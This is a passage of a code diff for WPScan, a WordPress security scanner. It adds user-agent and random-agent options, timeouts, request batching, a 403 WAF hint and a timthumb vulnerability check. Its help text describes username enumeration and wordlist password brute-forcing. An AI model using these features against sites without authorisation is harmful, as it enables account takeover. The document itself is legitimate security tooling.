+  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
+
+    /* Uncomment the "proxy" line to use the proxy
+        SOCKS proxies (4, 4A, 5) are supported, ie : "proxy": "socks5://127.0.0.1:9000"
+        If you do not specify the protocol, http will be used
+    */
+    //"proxy": "127.0.0.1:3128",
+    //"proxy_auth": "username:password",
+
+    "cache_ttl": 600, // 10 minutes, at this time the cache is cleaned before each scan. If this value is set to 0, the cache will be disabled
+
+    "request_timeout": 2000, // 2s
+
+    "connect_timeout": 1000, // 1s
+
+    "max_threads": 20
+}

lib/common/browser.rb

@@ -9,12 +9,10 @@ class Browser
   include Browser::Options
 
   OPTIONS = [
-    :available_user_agents,
     :basic_auth,
     :cache_ttl,
     :max_threads,
     :user_agent,
-    :user_agent_mode,
     :proxy,
     :proxy_auth,
     :request_timeout,
@@ -23,16 +21,22 @@ class Browser
 
   @@instance = nil
 
-  attr_reader :hydra, :config_file, :cache_dir
+  attr_reader :hydra, :cache_dir
+
+  attr_accessor :referer
 
   # @param [ Hash ] options
   #
   # @return [ Browser ]
   def initialize(options = {})
-    @config_file = options[:config_file] || CONF_DIR + '/browser.conf.json'
     @cache_dir   = options[:cache_dir]   || CACHE_DIR + '/browser'
 
-    load_config
+    # sets browser defaults
+    browser_defaults
+    # load config file
+    conf = options[:config_file]
+    load_config(conf) if conf
+    # overrides defaults with user supplied values (overwrite values from config)
     override_config(options)
 
     unless @hydra
@@ -61,6 +65,20 @@ class Browser
     @@instance = nil
   end
 
+  #
+  # sets browser default values
+  #
+  def browser_defaults
+    @max_threads = 20
+    # 10 minutes, at this time the cache is cleaned before each scan. If this value is set to 0, the cache will be disabled
+    @cache_ttl = 600
+    # 2s
+    @request_timeout = 2000
+    # 1s
+    @connect_timeout = 1000
+    @user_agent = "WPScan v#{WPSCAN_VERSION} (http://wpscan.org)"
+  end
+
   #
   # If an option was set but is not in the new config_file
   # it's value is kept
@@ -69,21 +87,20 @@ class Browser
   #
   # @return [ void ]
   def load_config(config_file = nil)
-    @config_file = config_file || @config_file
 
-    if File.symlink?(@config_file)
+    if File.symlink?(config_file)
       raise '[ERROR] Config file is a symlink.'
     else
-      data = JSON.parse(File.read(@config_file))
+      data = JSON.parse(File.read(config_file))
     end
 
     OPTIONS.each do |option|
       option_name = option.to_s
-
       unless data[option_name].nil?
         self.send(:"#{option_name}=", data[option_name])
       end
     end
+
   end
 
   # @param [ String ] url
@@ -101,7 +118,7 @@ class Browser
     params = Browser.append_params_header_field(
       params,
       'User-Agent',
-      self.user_agent
+      @user_agent
     )
 
     if @proxy
@@ -120,6 +137,7 @@ class Browser
       )
     end
 
+    params.merge!(referer: referer)
     params.merge!(timeout: @request_timeout) if @request_timeout
     params.merge!(connecttimeout: @connect_timeout) if @connect_timeout
 

lib/common/browser/options.rb

@@ -3,10 +3,8 @@
 class Browser
   module Options
 
-    USER_AGENT_MODES = %w{ static semi-static random }
-
-    attr_accessor :available_user_agents, :cache_ttl, :request_timeout, :connect_timeout
-    attr_reader   :basic_auth, :user_agent_mode, :proxy, :proxy_auth
+    attr_accessor :cache_ttl, :request_timeout, :connect_timeout
+    attr_reader   :basic_auth, :proxy, :proxy_auth
     attr_writer   :user_agent
 
     # Sets the Basic Authentification credentials
@@ -41,42 +39,6 @@ class Browser
       end
     end
 
-    # Sets the user_agent_mode, which can be one of the following:
-    #   static:      The UA is defined by the user, and will be the same in each requests
-    #   semi-static: The UA is randomly chosen at the first request, and will not change
-    #   random:      UA randomly chosen each request
-    #
-    # UA are from @available_user_agents
-    #
-    # @param [ String ] ua_mode
-    #
-    # @return [ void ]
-    def user_agent_mode=(ua_mode)
-      ua_mode ||= 'static'
-
-      if USER_AGENT_MODES.include?(ua_mode)
-        @user_agent_mode = ua_mode
-        # For semi-static user agent mode, the user agent has to
-        # be nil the first time (it will be set with the getter)
-        @user_agent = nil if ua_mode === 'semi-static'
-      else
-        raise "Unknow user agent mode : '#{ua_mode}'"
-      end
-    end
-
-    # @return [ String ] The user agent, according to the user_agent_mode
-    def user_agent
-      case @user_agent_mode
-      when 'semi-static'
-        unless @user_agent
-          @user_agent = @available_user_agents.sample
-        end
-      when 'random'
-        @user_agent = @available_user_agents.sample
-      end
-      @user_agent
-    end
-
     # Sets the proxy
     # Accepted format:
     #   [protocol://]host:post

lib/common/collections/wp_items/detectable.rb

@@ -17,6 +17,7 @@ class WpItems < Array
       hydra            = browser.hydra
       targets          = targets_items(wp_target, options)
       progress_bar     = progress_bar(targets.size, options)
+      queue_count      = 0
       exist_options    = {
         error_404_hash:  wp_target.error_404_hash,
         homepage_hash:   wp_target.homepage_hash,
@@ -43,8 +44,16 @@ class WpItems < Array
         end
 
         hydra.queue(request)
+        queue_count += 1
+
+        if queue_count >= browser.max_threads
+          hydra.run
+          queue_count = 0
+          puts "Sent #{browser.max_threads} requests ..." if options[:verbose]
+        end
       end
 
+      # run the remaining requests
       hydra.run
       results.sort!
       results # can't just return results.sort because the #sort returns an array, and we want a WpItems

lib/common/common_helper.rb

@@ -32,8 +32,9 @@ LOCAL_FILES_FILE    = DATA_DIR + '/local_vulnerable_files.xml'
 VULNS_XSD           = DATA_DIR + '/vuln.xsd'
 WP_VERSIONS_XSD     = DATA_DIR + '/wp_versions.xsd'
 LOCAL_FILES_XSD     = DATA_DIR + '/local_vulnerable_files.xsd'
+USER_AGENTS_FILE    = DATA_DIR + '/user-agents.txt'
 
-WPSCAN_VERSION       = '2.3'
+WPSCAN_VERSION       = '2.4.1'
 
 $LOAD_PATH.unshift(LIB_DIR)
 $LOAD_PATH.unshift(WPSCAN_LIB_DIR)
@@ -63,6 +64,14 @@ end
 
 require_files_from_directory(COMMON_LIB_DIR, '**/*.rb')
 
+# Hook to check if the target if down during the scan
+# The target is considered down after 10 requests with status = 0
+down = 0
+Typhoeus.on_complete do |response|
+  down += 1 if response.code == 0
+  fail 'The target seems to be down' if down >= 10
+end
+
 # Add protocol
 def add_http_protocol(url)
   url =~ /^https?:/ ? url : "http://#{url}"
@@ -86,6 +95,35 @@ def version
   REVISION ? "v#{WPSCAN_VERSION}r#{REVISION}" : "v#{WPSCAN_VERSION}"
 end
 
+# Define colors
+def colorize(text, color_code)
+  if $COLORSWITCH
+    "#{text}"
+  else
+    "\e[#{color_code}m#{text}\e[0m"
+  end
+end
+
+def bold(text)
+  colorize(text, 1)
+end
+
+def red(text)
+  colorize(text, 31)
+end
+
+def green(text)
+  colorize(text, 32)
+end
+
+def amber(text)
+  colorize(text, 33)
+end
+
+def blue(text)
+  colorize(text, 34)
+end
+
 # our 1337 banner
 def banner
   puts '_______________________________________________________________'
@@ -97,6 +135,7 @@ def banner
   puts '            \\/  \\/   |_|    |_____/ \\___|\\__,_|_| |_|'
   puts
   puts '        WordPress Security Scanner by the WPScan Team '
+  # Alignment of the version (w & w/o the Revision)
   if REVISION
     puts "                    Version #{version}"
   else
@@ -108,18 +147,6 @@ def banner
   puts
 end
 
-def colorize(text, color_code)
-  "\e[#{color_code}m#{text}\e[0m"
-end
-
-def red(text)
-  colorize(text, 31)
-end
-
-def green(text)
-  colorize(text, 32)
-end
-
 def xml(file)
   Nokogiri::XML(File.open(file)) do |config|
     config.noblanks
@@ -186,3 +213,19 @@ def truncate(input, size, trailing = '...')
       trailing.length >= input.length or size-trailing.length-1 >= input.length
   return "#{input[0..size-trailing.length-1]}#{trailing}"
 end
+
+# Gets a random User-Agent
+#
+# @return [ String ] A random user-agent from data/user-agents.txt
+def get_random_user_agent
+  user_agents = []
+  f = File.open(USER_AGENTS_FILE, 'r')
+  f.each_line do |line|
+    # ignore comments
+    next if line.empty? or line =~ /^\s*(#|\/\/)/
+    user_agents << line.strip
+  end
+  f.close
+  # return ransom user-agent
+  user_agents.sample
+end

lib/common/models/vulnerability/output.rb

@@ -5,17 +5,17 @@ class Vulnerability
 
     # output the vulnerability
     def output(verbose = false)
-      puts ' |'
-      puts ' | ' + red("* Title: #{title}")
+      puts
+      puts "#{red('[!]')} Title: #{title}"
       references.each do |key, urls|
         methodname = "url_#{key}"
         urls.each do |u|
           url = send(methodname, u)
-          puts ' | ' + red("* Reference: #{url}") if url
+          puts "    Reference: #{url}" if url
         end
       end
       if !fixed_in.empty?
-         puts " | * Fixed in: #{fixed_in}"
+         puts "#{blue('[i]')} Fixed in: #{fixed_in}"
       end
     end
   end

lib/common/models/vulnerability/urls.rb

@@ -14,7 +14,7 @@ class Vulnerability
     end
 
     def url_cve(cve)
-      "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-#{cve}"
+      "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-#{cve}"
     end
 
     def url_osvdb(id)
@@ -30,4 +30,4 @@ class Vulnerability
     end
 
   end
-end
+end

lib/common/models/wp_item/output.rb

@@ -6,13 +6,13 @@ class WpItem
     # @return [ Void ]
     def output(verbose = false)
       puts
-      puts " | Name: #{self}" #this will also output the version number if detected
-      puts " | Location: #{url}"
+      puts "#{green('[+]')} Name: #{self}" #this will also output the version number if detected
+      puts " |  Location: #{url}"
       #puts " | WordPress: #{wordpress_url}" if wordpress_org_item?
-      puts " | Readme: #{readme_url}" if has_readme?
-      puts " | Changelog: #{changelog_url}" if has_changelog?
-      puts " | " + red('[!]') + " Directory listing is enabled: #{url}" if has_directory_listing?
-      puts " | " + red('[!]') + " An error_log file has been found: #{error_log_url}" if has_error_log?
+      puts " |  Readme: #{readme_url}" if has_readme?
+      puts " |  Changelog: #{changelog_url}" if has_changelog?
+      puts "#{red('[!]')} Directory listing is enabled: #{url}" if has_directory_listing?
+      puts "#{red('[!]')} An error_log file has been found: #{error_log_url}" if has_error_log?
 
       additional_output(verbose) if respond_to?(:additional_output)
 

lib/common/models/wp_theme/findable.rb

@@ -43,8 +43,6 @@ class WpTheme < WpItem
       end
     end
 
-    # http://code.google.com/p/wpscan/issues/detail?id=141
-    #
     # @param [ URI ] target_uri
     #
     # @return [ WpTheme ]

lib/common/models/wp_theme/output.rb

@@ -5,18 +5,18 @@ class WpTheme
 
     # @return [ Void ]
     def additional_output(verbose = false)
-      puts " | Style URL: #{style_url}"
-      puts " | Theme Name: #@theme_name" if @theme_name
-      puts " | Theme URI: #@theme_uri" if @theme_uri
       theme_desc = verbose ? @theme_description : truncate(@theme_description, 100)
-      puts " | Description: #{theme_desc}"
-      puts " | Author: #@theme_author" if @theme_author
-      puts " | Author URI: #@theme_author_uri" if @theme_author_uri
-      puts " | Template: #@theme_template" if @theme_template and verbose
-      puts " | License: #@theme_license" if @theme_license and verbose
-      puts " | License URI: #@theme_license_uri" if @theme_license_uri and verbose
-      puts " | Tags: #@theme_tags" if @theme_tags and verbose
-      puts " | Text Domain: #@theme_text_domain" if @theme_text_domain and verbose
+      puts " |  Style URL: #{style_url}"
+      puts " |  Theme Name: #@theme_name" if @theme_name
+      puts " |  Theme URI: #@theme_uri" if @theme_uri
+      puts " |  Description: #{theme_desc}"
+      puts " |  Author: #@theme_author" if @theme_author
+      puts " |  Author URI: #@theme_author_uri" if @theme_author_uri
+      puts " |  Template: #@theme_template" if @theme_template and verbose
+      puts " |  License: #@theme_license" if @theme_license and verbose
+      puts " |  License URI: #@theme_license_uri" if @theme_license_uri and verbose
+      puts " |  Tags: #@theme_tags" if @theme_tags and verbose
+      puts " |  Text Domain: #@theme_text_domain" if @theme_text_domain and verbose
     end
 
   end

lib/common/models/wp_timthumb.rb

@@ -3,11 +3,13 @@
 require 'wp_timthumb/versionable'
 require 'wp_timthumb/existable'
 require 'wp_timthumb/output'
+require 'wp_timthumb/vulnerable'
 
 class WpTimthumb < WpItem
   include WpTimthumb::Versionable
   include WpTimthumb::Existable
   include WpTimthumb::Output
+  include WpTimthumb::Vulnerable
 
   # @param [ WpTimthumb ] other
   #

lib/common/models/wp_timthumb/output.rb

@@ -4,7 +4,7 @@ class WpTimthumb < WpItem
   module Output
 
     def output(verbose = false)
-      puts ' | ' + red('[!]') + " #{self}"
+      puts " | #{vulnerable? ? red('[!] Vulnerable') : green('[i] Not Vulnerable')} #{self}"
     end
 
   end

lib/common/models/wp_timthumb/vulnerable.rb

@@ -0,0 +1,9 @@
+# encoding: UTF-8
+
+class WpTimthumb < WpItem
+  module Vulnerable
+    def vulnerable?
+      VersionCompare.is_newer_or_same?(version, '1.34')
+    end
+  end
+end

lib/common/models/wp_user.rb

@@ -12,7 +12,7 @@ class WpUser < WpItem
   # @return [ Array<Symbol> ]
   def allowed_options; [:id, :login, :display_name, :password] end
 
-  # @return [ URI ] The uri to the auhor page
+  # @return [ URI ] The uri to the author page
   def uri
     if id
       return @uri.merge("?author=#{id}")
@@ -54,8 +54,8 @@ class WpUser < WpItem
   # @return [ String ]
   def to_s
     s  = "#{id}"
-    s += " | #{login}" if login
-    s += " | #{display_name}" if display_name
+    s << " | #{login}" if login
+    s << " | #{display_name}" if display_name
     s
   end
 

lib/common/models/wp_user/brute_forcable.rb

@@ -29,7 +29,7 @@ class WpUser < WpItem
 
       File.open(wordlist).each do |password|
         password.chop!
-        
+
         # A successfull login will redirect us to the redirect_to parameter
         # Generate a random one on each request
         unless redirect_url

lib/common/models/wp_version/findable.rb

@@ -190,8 +190,6 @@ class WpVersion < WpItem
 
     # Attempts to find the WordPress version from the sitemap.xml file.
     #
-    # See: http://code.google.com/p/wpscan/issues/detail?id=109
-    #
     # @param [ URI ] target_uri
     #
     # @return [ String ] The version number

lib/common/models/wp_version/output.rb

@@ -5,12 +5,12 @@ class WpVersion < WpItem
 
     def output(verbose = false)
       puts
-      puts green('[+]') + " WordPress version #{self.number} identified from #{self.found_from}"
+      puts "#{green('[+]')} WordPress version #{self.number} identified from #{self.found_from}"
 
       vulnerabilities = self.vulnerabilities
 
       unless vulnerabilities.empty?
-        puts red('[!]') + " #{vulnerabilities.size} vulnerabilities identified from the version number"
+        puts "#{red('[!]')} #{vulnerabilities.size} vulnerabilities identified from the version number"
 
         vulnerabilities.output
       end

lib/common/typhoeus_cache.rb

@@ -2,25 +2,14 @@
 
 require 'common/cache_file_store'
 
-# Implementaion of a cache_key (Typhoeus::Request#hash has too many options)
-module Typhoeus
-  class Request
-    module Cacheable
-      def cache_key
-        Digest::SHA2.hexdigest("#{url}-#{options[:body]}-#{options[:method]}")[0..32]
-      end
-    end
-  end
-end
-
 class TyphoeusCache < CacheFileStore
 
   def get(request)
-    read_entry(request.cache_key)
+    read_entry(request.hash.to_s)
   end
 
   def set(request, response)
-    write_entry(request.cache_key, response, request.cache_ttl)
+    write_entry(request.hash.to_s, response, request.cache_ttl)
   end
 
 end

lib/wpscan/web_site.rb

@@ -32,7 +32,7 @@ class WebSite
 
   def has_xml_rpc?
     response = Browser.get_and_follow_location(xml_rpc_url)
-    response.body =~ %r{XML-RPC server accepts POST requests only}i    
+    response.body =~ %r{XML-RPC server accepts POST requests only}i
   end
 
   # See http://www.hixie.ch/specs/pingback/pingback-1.0#TOC2.3
@@ -71,7 +71,7 @@ class WebSite
   #
   # @return [ String ] The MD5 hash of the page
   def self.page_hash(page)
-    page = Browser.get(page) unless page.is_a?(Typhoeus::Response)
+    page = Browser.get(page, { followlocation: true, cache_ttl: 0 }) unless page.is_a?(Typhoeus::Response)
 
     Digest::MD5.hexdigest(page.body.gsub(/<!--.*?-->/m, ''))
   end

lib/wpscan/wp_target.rb

@@ -29,6 +29,7 @@ class WpTarget < WebSite
     @multisite      = nil
 
     Browser.instance(options.merge(:max_threads => options[:threads]))
+    Browser.instance.referer = url
   end
 
   # check if the target website is
@@ -38,6 +39,11 @@ class WpTarget < WebSite
 
     response = Browser.get_and_follow_location(@uri.to_s)
 
+    # Note: in the future major WPScan version, change the user-agent to see
+    # if the response is a 200 ?
+    fail "The target is responding with a 403, this might be due to a WAF or a plugin\n" \
+          'You should try to supply a valid user-agent via the --user-agent option' if response.code == 403
+
     if response.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i
       wordpress = true
     else
@@ -93,7 +99,7 @@ class WpTarget < WebSite
   end
   # :nocov:
 
-  # The version is not yet considerated
+  # The version is not yet considered
   #
   # @param [ String ] name
   # @param [ String ] version

lib/wpscan/wp_target/wp_login_protection.rb

@@ -12,7 +12,6 @@ class WpTarget < WebSite
     end
 
     # Checks if a login protection plugin is enabled
-    # http://code.google.com/p/wpscan/issues/detail?id=111
     # return a WpPlugin object or nil if no one is found
     def login_protection_plugin
       unless @login_protection_plugin

lib/wpscan/wpscan_helper.rb

@@ -60,13 +60,12 @@ end
 def help
   puts 'Help :'
   puts
-  puts 'Some values are settable in conf/browser.conf.json :'
-  puts '  user-agent, proxy, proxy-auth, threads, cache timeout and request timeout'
+  puts 'Some values are settable in a config file, see the example.conf.json'
   puts
-  puts '--update   Update to the latest revision'
-  puts '--url   | -u <target url>  The WordPress URL/domain to scan.'
-  puts '--force | -f Forces WPScan to not check if the remote site is running WordPress.'
-  puts '--enumerate | -e [option(s)]  Enumeration.'
+  puts '--update                            Update to the latest revision.'
+  puts '--url       | -u <target url>       The WordPress URL/domain to scan.'
+  puts '--force     | -f                    Forces WPScan to not check if the remote site is running WordPress.'
+  puts '--enumerate | -e [option(s)]        Enumeration.'
   puts '  option :'
   puts '    u        usernames from id 1 to 10'
   puts '    u[10-20] usernames from id 10 to 20 (you must write [] chars)'
@@ -80,20 +79,31 @@ def help
   puts '  Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins'
   puts '  If no option is supplied, the default is "vt,tt,u,vp"'
   puts
-  puts '--exclude-content-based "<regexp or string>" Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied'
-  puts '                                             You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)'
-  puts '--config-file | -c <config file> Use the specified config file'
-  puts '--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not'
-  puts '--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed'
-  puts '--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed'
-  puts '--proxy <[protocol://]host:port> Supply a proxy (will override the one from conf/browser.conf.json).'
-  puts '                                 HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used'
-  puts '--proxy-auth <username:password>  Supply the proxy login credentials (will override the one from conf/browser.conf.json).'
-  puts '--basic-auth <username:password>  Set the HTTP Basic authentication'
-  puts '--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.'
-  puts '--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)'
-  puts '--username | -U <username>  Only brute force the supplied username.'
-  puts '--help     | -h This help screen.'
-  puts '--verbose  | -v Verbose output.'
+  puts '--exclude-content-based "<regexp or string>"'
+  puts '                                    Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.'
+  puts '                                    You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).'
+  puts '--config-file  | -c <config file>   Use the specified config file, see the example.conf.json.'
+  puts '--user-agent   | -a <User-Agent>    Use the specified User-Agent.'
+  puts '--random-agent | -r                 Use a random User-Agent.'
+  puts '--follow-redirection                If the target url has a redirection, it will be followed without asking if you wanted to do so or not'
+  puts '--batch                             Never ask for user input, use the default behaviour.'
+  puts '--no-color                          Do not use colors in the output.'
+  puts '--wp-content-dir <wp content dir>   WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it.'
+  puts '                                    Subdirectories are allowed.'
+  puts '--wp-plugins-dir <wp plugins dir>   Same thing than --wp-content-dir but for the plugins directory.'
+  puts '                                    If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed'
+  puts '--proxy <[protocol://]host:port>    Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.'
+  puts '                                    If no protocol is given (format host:port), HTTP will be used.'
+  puts '--proxy-auth <username:password>    Supply the proxy login credentials.'
+  puts '--basic-auth <username:password>    Set the HTTP Basic authentication.'
+  puts '--wordlist | -w <wordlist>          Supply a wordlist for the password bruter and do the brute.'
+  puts '--username | -U <username>          Only brute force the supplied username.'
+  puts '--threads  | -t <number of threads> The number of threads to use when multi-threading requests.'
+  puts '--cache-ttl       <cache-ttl>       Typhoeus cache TTL.'
+  puts '--request-timeout <request-timeout> Request Timeout.'
+  puts '--connect-timeout <connect-timeout> Connect Timeout.'
+  puts '--max-threads     <max-threads>     Maximum Threads.'
+  puts '--help     | -h                     This help screen.'
+  puts '--verbose  | -v                     Verbose output.'
   puts
 end

lib/wpscan/wpscan_options.rb

@@ -3,6 +3,7 @@
 class WpscanOptions
 
   ACCESSOR_OPTIONS = [
+    :batch,
     :enumerate_plugins,
     :enumerate_only_vulnerable_plugins,
     :enumerate_all_plugins,
@@ -12,6 +13,7 @@ class WpscanOptions
     :enumerate_timthumbs,
     :enumerate_usernames,
     :enumerate_usernames_range,
+    :no_color,
     :proxy,
     :proxy_auth,
     :threads,
@@ -30,7 +32,13 @@ class WpscanOptions
     :exclude_content_based,
     :basic_auth,
     :debug_output,
-    :version
+    :version,
+    :user_agent,
+    :random_agent,
+    :cache_ttl,
+    :request_timeout,
+    :connect_timeout,
+    :max_threads
   ]
 
   attr_accessor *ACCESSOR_OPTIONS
@@ -136,6 +144,10 @@ class WpscanOptions
     !to_h.empty?
   end
 
+  def random_agent=(useless)
+    @user_agent = get_random_user_agent
+  end
+
   # return Hash
   def to_h
     options = {}
@@ -227,6 +239,8 @@ class WpscanOptions
       ['--wordlist', '-w', GetoptLong::REQUIRED_ARGUMENT],
       ['--threads', '-t', GetoptLong::REQUIRED_ARGUMENT],
       ['--force', '-f', GetoptLong::NO_ARGUMENT],
+      ['--user-agent', '-a', GetoptLong::REQUIRED_ARGUMENT],
+      ['--random-agent', '-r', GetoptLong::NO_ARGUMENT],
       ['--help', '-h', GetoptLong::NO_ARGUMENT],
       ['--verbose', '-v', GetoptLong::NO_ARGUMENT],
       ['--proxy', GetoptLong::REQUIRED_ARGUMENT],
@@ -239,7 +253,13 @@ class WpscanOptions
       ['--exclude-content-based', GetoptLong::REQUIRED_ARGUMENT],
       ['--basic-auth', GetoptLong::REQUIRED_ARGUMENT],
       ['--debug-output', GetoptLong::NO_ARGUMENT],
-      ['--version', GetoptLong::NO_ARGUMENT]
+      ['--version', GetoptLong::NO_ARGUMENT],
+      ['--cache-ttl', GetoptLong::REQUIRED_ARGUMENT],
+      ['--request-timeout', GetoptLong::REQUIRED_ARGUMENT],
+      ['--connect-timeout', GetoptLong::REQUIRED_ARGUMENT],
+      ['--max-threads', GetoptLong::REQUIRED_ARGUMENT],
+      ['--batch', GetoptLong::NO_ARGUMENT],
+      ['--no-color', GetoptLong::NO_ARGUMENT]
     )
   end
 

lib/wpstools/plugins/checker/checker_plugin.rb

@@ -32,10 +32,12 @@ class CheckerPlugin < Plugin
       xml = xml(vuln_ref_file)
 
       urls = []
-      xml.xpath('//reference').each { |node| urls << node.text }
+      xml.xpath('//references/url').each { |node| urls << node.text }
 
       urls.uniq!
 
+      puts "[!] No URLs found in #{vuln_ref_file}!" if urls.empty?
+
       dead_urls       = []
       queue_count     = 0
       request_count   = 0

lib/wpstools/plugins/stats/stats_plugin.rb

@@ -6,7 +6,7 @@ class StatsPlugin < Plugin
     super(author: 'WPScanTeam - Christian Mehlmauer')
 
     register_options(
-        ['--stats', '--s', 'Show WpScan Database statistics']
+        ['--stats', '-s', 'Show WpScan Database statistics.']
     )
   end
 
@@ -20,15 +20,19 @@ class StatsPlugin < Plugin
 
       puts "WPScan Database Statistics:"
       puts "---------------------------"
-      puts "[#] Total WordPress Sites in the World: #{get_wp_installations}"
       puts
       puts "[#] Total vulnerable versions: #{vuln_core_count}"
       puts "[#] Total vulnerable plugins:  #{vuln_plugin_count}"
       puts "[#] Total vulnerable themes:   #{vuln_theme_count}"
       puts
       puts "[#] Total version vulnerabilities: #{version_vulns_count}"
+      puts "[#] Total fixed vulnerabilities:   #{fix_version_count}"
+      puts
       puts "[#] Total plugin vulnerabilities:  #{plugin_vulns_count}"
+      puts "[#] Total fixed vulnerabilities:   #{fix_plugin_count}"
+      puts
       puts "[#] Total theme vulnerabilities:   #{theme_vulns_count}"
+      puts "[#] Total fixed vulnerabilities:   #{fix_theme_count}"
       puts
       puts "[#] Total plugins to enumerate:  #{total_plugins}"
       puts "[#] Total themes to enumerate:   #{total_themes}"
@@ -58,15 +62,26 @@ class StatsPlugin < Plugin
   def version_vulns_count(file=WP_VULNS_FILE)
     xml(file).xpath('count(//vulnerability)').to_i
   end
+  def fix_version_count(file=WP_VULNS_FILE)
+    xml(file).xpath('count(//fixed_in)').to_i
+  end
 
   def plugin_vulns_count(file=PLUGINS_VULNS_FILE)
     xml(file).xpath('count(//vulnerability)').to_i
   end
 
+  def fix_plugin_count(file=PLUGINS_VULNS_FILE)
+    xml(file).xpath('count(//fixed_in)').to_i
+  end
+
   def theme_vulns_count(file=THEMES_VULNS_FILE)
     xml(file).xpath('count(//vulnerability)').to_i
   end
 
+  def fix_theme_count(file=THEMES_VULNS_FILE)
+    xml(file).xpath('count(//fixed_in)').to_i
+  end
+
   def total_plugins(file=PLUGINS_FULL_FILE)
     lines_in_file(file)
   end
@@ -79,9 +94,4 @@ class StatsPlugin < Plugin
     IO.readlines(file).size
   end
 
-  def get_wp_installations()
-    page = Nokogiri::HTML(Typhoeus.get('http://en.wordpress.com/stats/').body)
-    page.css('span[class="stats-flipper-number"]').text
-  end
-
 end

spec/lib/common/browser_spec.rb

@@ -6,9 +6,9 @@ describe Browser do
   it_behaves_like 'Browser::Actions'
   it_behaves_like 'Browser::Options'
 
-  CONFIG_FILE_WITHOUT_PROXY       = SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf.json'
-  CONFIG_FILE_WITH_PROXY          = SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf_proxy.json'
-  #CONFIG_FILE_WITH_PROXY_AND_AUTH = SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf_proxy_auth.json'
+  CONFIG_FILE_WITHOUT_PROXY       = SPEC_FIXTURES_CONF_DIR + '/browser.conf.json'
+  CONFIG_FILE_WITH_PROXY          = SPEC_FIXTURES_CONF_DIR + '/browser.conf_proxy.json'
+  #CONFIG_FILE_WITH_PROXY_AND_AUTH = SPEC_FIXTURES_CONF_DIR + '/browser.conf_proxy_auth.json'
 
   subject(:browser) {
     Browser.reset
@@ -16,14 +16,13 @@ describe Browser do
   }
   let(:options) { {} }
   let(:instance_vars_to_check) {
-    ['user_agent', 'user_agent_mode', 'available_user_agents', 'proxy',
-     'max_threads', 'cache_ttl', 'request_timeout', 'connect_timeout']
+    ['proxy', 'max_threads', 'cache_ttl', 'request_timeout', 'connect_timeout']
   }
   let(:json_config_without_proxy) { JSON.parse(File.read(CONFIG_FILE_WITHOUT_PROXY)) }
   let(:json_config_with_proxy)    { JSON.parse(File.read(CONFIG_FILE_WITH_PROXY)) }
 
   def check_instance_variables(browser, json_expected_vars)
-    json_expected_vars['max_threads'] ||= 1 # max_thread can not be nil
+    json_expected_vars['max_threads'] ||= 20 # max_thread can not be nil
 
     instance_vars_to_check.each do |variable_name|
       browser.send(:"#{variable_name}").should === json_expected_vars[variable_name]
@@ -39,12 +38,6 @@ describe Browser do
   describe '::instance' do
     after { check_instance_variables(browser, @json_expected_vars) }
 
-    context "when default config_file = #{CONFIG_FILE_WITHOUT_PROXY}" do
-      it 'will check the instance vars' do
-        @json_expected_vars = json_config_without_proxy
-      end
-    end
-
     context "when :config_file = #{CONFIG_FILE_WITH_PROXY}" do
       let(:options) { { config_file: CONFIG_FILE_WITH_PROXY } }
 
@@ -138,12 +131,13 @@ describe Browser do
         ssl_verifypeer: false, ssl_verifyhost: 0,
         cookiejar: cookie_jar, cookiefile: cookie_jar,
         timeout: 2000, connecttimeout: 1000,
-        maxredirs: 3
+        maxredirs: 3,
+        referer: nil
       }
     }
 
     after :each do
-      browser.stub(user_agent: 'SomeUA')
+      browser.user_agent = 'SomeUA'
       browser.cache_ttl = 250
 
       browser.merge_request_params(params).should == @expected

spec/lib/common/version_compare_spec.rb

@@ -31,6 +31,11 @@ describe 'VersionCompare' do
         @version1 = '0'
         @version2 = '1'
       end
+
+      it 'returns true' do
+        @version1 = '0.4.2b'
+        @version2 = '2.3.3'
+      end
     end
 
     context 'version checked is older' do

spec/lib/wpscan/web_site_spec.rb

@@ -12,7 +12,7 @@ describe 'WebSite' do
   before :all do
     Browser::reset
     Browser.instance(
-      config_file: SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf.json',
+      config_file: SPEC_FIXTURES_CONF_DIR + '/browser.conf.json',
       cache_ttl: 0
     )
   end

spec/lib/wpscan/wp_target_spec.rb

@@ -9,7 +9,7 @@ describe WpTarget do
   let(:login_url)     { wp_target.uri.merge('wp-login.php').to_s }
   let(:options)       {
     {
-      config_file:    SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf.json',
+      config_file:    SPEC_FIXTURES_CONF_DIR + '/browser.conf.json',
       cache_ttl:      0,
       wp_content_dir: 'wp-content',
       wp_plugins_dir: 'wp-content/plugins'
@@ -97,6 +97,14 @@ describe WpTarget do
         wp_target.should_not be_wordpress
       end
     end
+
+    context 'when the response is a 403' do
+      before { stub_request(:any, /.*/).to_return(status: 403) }
+
+      it 'raises an error' do
+        expect { wp_target.wordpress? }.to raise_error
+      end
+    end
   end
 
   describe '#wordpress_hosted?' do

spec/samples/conf/browser.conf.json

@@ -0,0 +1,7 @@
+{
+    "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
+    "cache_ttl": 600,
